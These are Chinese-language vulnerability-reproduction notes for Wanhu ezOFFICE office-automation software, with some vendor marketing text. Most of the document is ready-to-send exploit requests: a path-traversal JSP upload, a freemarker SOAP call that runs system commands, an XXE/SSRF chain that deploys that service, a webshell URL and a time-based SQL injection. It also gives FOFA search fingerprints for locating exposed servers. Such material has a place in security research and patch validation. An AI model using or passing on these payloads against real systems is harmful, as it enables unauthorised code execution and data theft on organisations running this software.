漏洞复现-万户ezOFFICE系列

POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=Oracle&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cache-Control: max-age=0
Content-Length: 176
Content-Type: multipart/form-data; boundary=55aeb894de1521afe560c924fad7c6fb

--55aeb894de1521afe560c924fad7c6fb
Content-Disposition: form-data; name="NewFile"; filename="test.jsp"

<%  test%>
--55aeb894de1521afe560c924fad7c6fb--

upload address:
/defaultroot/platform/portal/layout/test.jsp

(12).万户OA--------------------------------------------fofa:body=“/defaultroot/”

万户软件网络是业内普遍认可的智慧政务办公专家,OA系统国家行业标准编制组长单位,协同软件国家行业标准编制组长单位,22年专注协同管理领域.为您提供定制化的智慧政务一体化办公解决方案。


万户ezOFFICE企业版解决方案由五大应用、两个支撑平台组成，分别为知识管理、工作流程、沟通交流、辅助办公、集成解决方案及应用支撑平台、基础支撑平台。
　　知识管理：搭建企业知识库，为知识的沉淀、共享、学习、应用、创新提供了基础；
　　工作流程：打造企业内部电子化流程管理，是协助企业制度落地的有效管理工具；
　　沟通交流：搭建了员工与员工、上级与下级单位之间的沟通桥梁，提升了企业的快速应变能力；
　　辅助办公：提供了个人事务管理、行政后勤管理及人事管理，有效组织和管理企业的员工，以及他们的工作；
　　集成解决方案：可集成VPN、电子签章、CA认证、财务系统、HR系统、CRM系统、ERP软件、外部邮件等功能；
　　应用支撑平台：提供组织机构、用户、角色、权限管理体系及日志与系统安全体系，并设计有丰富的第三方系统接口；
　　基础支撑平台：系统可运行在windows、linux、unix、AIX、solaris等多种操作系统上、支持IBM websphere、ORACLE weblogic、tomcat等、支持oracle、sqlserver、DB2、mysql、sybase等多种关系型数据库。

万户OA

[+]万户协同办公平台 ezoffice存在未授权访问漏洞

|wanhu|ezOFFICE|OA|SendFileCheckTemplateEdit|sqli|

wanhu_office|app=“万户ezOFFICE协同管理平台”

万户ezEIP

安全情报，万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入漏洞

https://mp.weixin.qq.com/s/KHLtRG9_a6C28-ojKDh-Zw

万户OA DocumentEdit_unite.jsp 存在sql注入

北京万户软件技术有限公司存在sql注入

万户协同办公平台 ezoffice 未授权访问

RCE

https://mp.weixin.qq.com/s/pFRB6xDLDkeNRNydOlb0fw

xml代码注入 XXE

漏洞名称：万户OA xml代码注入漏洞
漏洞编号：无
漏洞等级：高
披漏时间：2023年6月15日


0x02 漏洞描述

XML注入漏洞是指攻击者能够向应用程序提交恶意构造的XML数据，导致应用程序解析XML时发生意外行为或执行恶意操作。这可能导致数据泄露、远程代码执行或其他安全问题。


影响版本

Wanhu OA null 





XML代码注入（XML injection）通常也被称为（XML External Entity vulnerabilities）。

XXE漏洞是一种攻击XML解析器的安全漏洞，攻击者可以通过构建恶意的XML文件来利用此漏洞。攻击者可以在恶意XML文件中定义外部实体，以便在XML解析过程中引用这些外部实体。然而，由于没有适当的限制和措施，这些外部实体可能会导致XML解析器执行未经授权的操作，从而导致敏感信息泄露或拒绝服务攻击等风险。

因此，当输入数据被解释为XML时，应该采取预防措施来避免XXE漏洞。例如，使用XML解析器的最新版本，并采用安全的配置；禁止或限制外部实体的定义和使用；使用白名单过滤器来验证输入数据，并确保只允许预期的标签和属性。

🔪freemarkerService XXE

POST /defaultroot/services/./././freemarkerService HTTP/1.1
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
Content-Length: 638
Host: x
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101
Firefox/110.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;
q=0.8
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:util="http://utility.template.freemarker"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">
<soapenv:Header/>
<soapenv:Body>
<util:exec
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<arguments xsi:type="xst:ArrayOf_xsd_anyType"
soapenc:arrayType="xsd:anyType[]">
<cmd xsi:type="soapenc:string"> whoami </cmd>
</arguments>
</util:exec>
</soapenv:Body>
</soapenv:Envelope>
    

🔪GeneralWeb-xxe

POST /defaultroot/xfservices/././././GeneralWeb;1.js HTTP/1.1
Host: x
Content-Type: text/xml;charset=UTF-8
User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Accept-Encoding: gzip, deflate
SOAPAction: 
Cache-Control: no-cache
Pragma: no-cache
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:gen="http://com.whir.service/GeneralWeb">
    <soapenv:Header/>
    <soapenv:Body>
        <gen:OAManager>
            <gen:input>&lt;?xml version="1.0" encoding="UTF-8"?&gt;
&lt;!DOCTYPE root [
&lt;!ENTITY x SYSTEM "http://127.0.0.1:5001/defaultroot/services/./././AdminService?method=!--%3E%3Cns1%3Adeployment%20xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%20xmlns%3Ajava%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2Fproviders%2Fjava%22%20xmlns%3Ans1%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%3E%3Cns1%3Aservice%20name%3D%22freemarkerService%22%20provider%3D%22java%3ARPC%22%3E%3Cns1%3Aparameter%20name%3D%22className%22%20value%3D%22freemarker.template.utility.Execute%22%2F%3E%3Cns1%3Aparameter%20name%3D%22allowedMethods%22%20value%3D%22exec%22%2F%3E%3C%2Fns1%3Aservice%3E%3C%2Fns1%3Adeployment&quot;&gt;%remote;]&gt;
&lt;root&gt;&amp;x;&lt;/root&gt;</gen:input>
        </gen:OAManager>
    </soapenv:Body>
</soapenv:Envelope>

officeserverservlet + attachmentserver RCE

/defaultroot/upload/html/osias.jsp?i=whoami&pwd=osias

showResultSQL注入

🔪DocumentEdit.jsp

wanhuoa-DocumentEdit-sqli.yaml

0x01、漏洞描述
万户OA DocumentEdit.jsp文件存在SQL注入漏洞，攻击者通过发送特殊的请求包可以对数据库进行SQL注入，获取服务器敏感信息；


漏洞影响：

万户OA
网络测绘：

app="万户网络-ezOFFICE"


GET /defaultroot/public/iWebOfficeSign/DocumentEdit_deal.jsp;?RecordID=1%27%20WAITFOR%20DELAY%20%270:0:1%27-- HTTP/1.1
Host: 127.0.0.1
User-Agent: Moziilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip, deflate, br







如下的POC进行验证，当系统响应时间超过5秒时，即可证明漏洞存在；
/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public